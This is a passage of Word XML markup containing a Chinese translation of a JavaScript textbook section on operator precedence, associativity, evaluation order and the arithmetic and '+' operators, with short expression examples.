        <w:t>中所示的运算符是按照优先级从高到低排序的，每个水平分割线内的一组运算符具有相同的优先级。运算符优先级控制着运算符的执行顺序。优先级高的运算符（表格的顶部）的执行总是先于优先级低（表格的底部）的运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>看一下下面这个表达式</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=x+y*z;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>乘法运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>比加法运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>具有更高的优先级，所以乘法先执行，加法后执行。然后，由于赋值运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“=”</w:t>
      </w:r>
      <w:r>
        <w:t>具有最低的优先级，因此赋值操作是在右侧的表达式计算出结果后进行的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符的优先级可以通过显式使用圆括号来重写。为了让加法先执行，乘法后执行，可以这样写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=(x+y)*z;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，属性访问表达式和调用表达式的优先级要比表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列出的所有运算符都要高。看一下这个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof my.functions[x](y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>是优先级最高的运算符之一，但</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>也是在两次属性访问和函数调用之后执行的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>实际上，如果你真的不确定你所使用的运算符的优先级，最简单的方法就是使用圆括号来强行指定运算次序。有些重要规则需要熟记：乘法和除法的优先级高于加法和减法，赋值运算的优先级非常低，通常总是最后执行的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="4_7_6_Yun_Suan_Fu_De_Jie_He_Xing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.7.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　运算符的结合性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在表</w:t>
      </w:r>
      <w:r>
        <w:t>4-1</w:t>
      </w:r>
      <w:r>
        <w:t>中标题为</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>的列说明了运算符的结合性。</w:t>
      </w:r>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>指从左至右结合，</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>指从右至左结合。结合性指定了在多个具有同样优先级的运算符表达式中的运算顺序。从左至右是指运算的执行是按照由左到右的顺序进行。例如，减法运算符具有从左至右的结合性，因此：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=x-y-z;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和这段代码一模一样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=((x-y)-z);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>反过来讲，下面这个表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>-y;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>w=x=y=z;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>q=a?b:c?d:e?f:g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和这段代码一模一样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>(-y);w=(x=(y=z));q=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a?b:(c?d:(e?f:g));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因为一元操作符、赋值和三元条件运算符都具有从右至左的结合性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="4_7_7_Yun_Suan_Shun_Xu_"/>
      <w:r>
        <w:t>4.7.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　运算顺序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符的优先级和结合性规定了它们在复杂的表达式中的运算顺序，但并没有规定子表达式的计算过程中的运算顺序。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>总是严格按照从左至右的顺序来计算表达式。例如，在表达式</w:t>
      </w:r>
      <w:r>
        <w:t>w=x+y*z</w:t>
      </w:r>
      <w:r>
        <w:t>中，将首先计算子表达式</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>，然后计算</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>，然后，</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>的值和</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>的值相乘，再加上</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值，最后将其赋值给表达式</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:t>所指代的变量或属性。给表达式添加圆括号将会改变乘法、加法和赋值运算的关系，但从左至右的顺</w:t>
      </w:r>
      <w:r>
        <w:t>序是不会改变的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>只有在任何一个表达式具有副作用而影响到其他表达式的时候，其求值顺序才会和看上去有所不同。如果表达式</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个变量自增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，这个变量在表达式</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>中使用，那么实际上是先计算出了</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值再计算</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>的值，这一点非常重要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="4_8_Suan_Zhu_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　算术表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本节涵盖了那些进行算术计算的运算符，以及对操作数的算术操作。乘法、除法和减法运算符非常简单，我们首先讲解它们。加法运算符单独占一节，因为加法同样可以做字符串连接操作，并且其类型转换有些特殊。一元运算符和位运算符同样在单独的两节中会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>基本的算术运算符是</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>（乘</w:t>
      </w:r>
      <w:r>
        <w:t>法）、</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>（除法）、</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>（求余）、</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>（加法）和</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>（减法）。我们会在随后有专门一节讲述</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符。剩下的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个运算符非常简单，只是在必要的时候将操作数转换为数字而已，然后求积、商、余数和差。所有那些无法转换为数字的操作数都转换为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>值。如果操作数（或者转换结果）是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>值，算术运算的结果也是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“/”</w:t>
      </w:r>
      <w:r>
        <w:t>用第二个操作数来除第一个操作数，如果你使用过那些区分整型和浮点型数字的编程语言，那么当用一个整数除以另一个整数时，则希望得到的结果也是整数。但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，所有的数字都是浮点型的，除法运算的</w:t>
      </w:r>
      <w:r>
        <w:t>结果也是浮点型，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>5/2</w:t>
      </w:r>
      <w:r>
        <w:t>的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>。除数为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的运算结果为正无穷大或负无穷大，而</w:t>
      </w:r>
      <w:r>
        <w:t>0/0</w:t>
      </w:r>
      <w:r>
        <w:t>的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，所有这些运算均不会报错。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“%”</w:t>
      </w:r>
      <w:r>
        <w:t>计算的是第一个操作数对第二个操作数的模</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。换句话说，就是第一个操作数除以第二个操作数的余数。结果的符号</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和第一个操作数（被除数）的符号保持一致。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>5%2</w:t>
      </w:r>
      <w:r>
        <w:t>结果是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>-5%2</w:t>
      </w:r>
      <w:r>
        <w:t>的结果是</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>求余运算符的操作数通常都是整数，但也适用于浮点数，比如，</w:t>
      </w:r>
      <w:r>
        <w:t>6.5%2.1</w:t>
      </w:r>
      <w:r>
        <w:t>结果是</w:t>
      </w:r>
      <w:r>
        <w:t>0.2</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="4_8_1____Yun_Suan_Fu_"/>
      <w:r>
        <w:t>4.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>二元加法运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>可以对两个数字做加法，也可以做字</w:t>
      </w:r>
      <w:r>
        <w:t>符串连接操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hello"+""+"there"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"hello there"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"+"2"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"12"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当两个操作数都是数字或都是字符串的时候，计算结果是显而易见的。然而对于其他情况来说，则要进行一些必要的类型转换，并且运算符的行为依赖于类型转换的结果。加号的转换规则优先考虑字符串连接，如果其中一个操作数是字符串或者转换为字符串的对象，另外一个操作数将会转换为字符串，加法将进行字符串的连接操作。如果两个操作数都不是类字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>string-like</w:t>
      </w:r>
      <w:r>
        <w:t>）的，那么都将进行算术加</w:t>
      </w:r>
      <w:r>
        <w:t>法运算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从技术上讲，加法操作符的行为表现为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果其中一个操作数是对象，则对象会遵循对象到原始值的转换规则转换为原始类值（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）：日期对象通过</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法执行转换，其他对象则通过</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法执行转换（如果</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回一个原始值的话）。由于多数对象都不具备可用的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因此它们会通过</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来执行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在进行了对象到原始值的转换后，如果其中一个操作数是字符串的话，另一个操作数也会转换为字符串，然后进行字符串连接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>否则，</w:t>
      </w:r>
      <w:r>
        <w:t>两个操作数都将转换为数字（或者</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>），然后进行加法操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里有一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:t>加法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"+"2"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"12":</w:t>
      </w:r>
      <w:r>
        <w:t>字符串连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1"+2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"12":</w:t>
      </w:r>
      <w:r>
        <w:t>数字转换为字符串后进行字符串连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1+{}//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"1[object Object]":</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为字符串后进行字符串连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>true+true//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:t>布尔值转换为数字后做加法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>2+null//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2:null</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>后做加法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>2+undefined//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
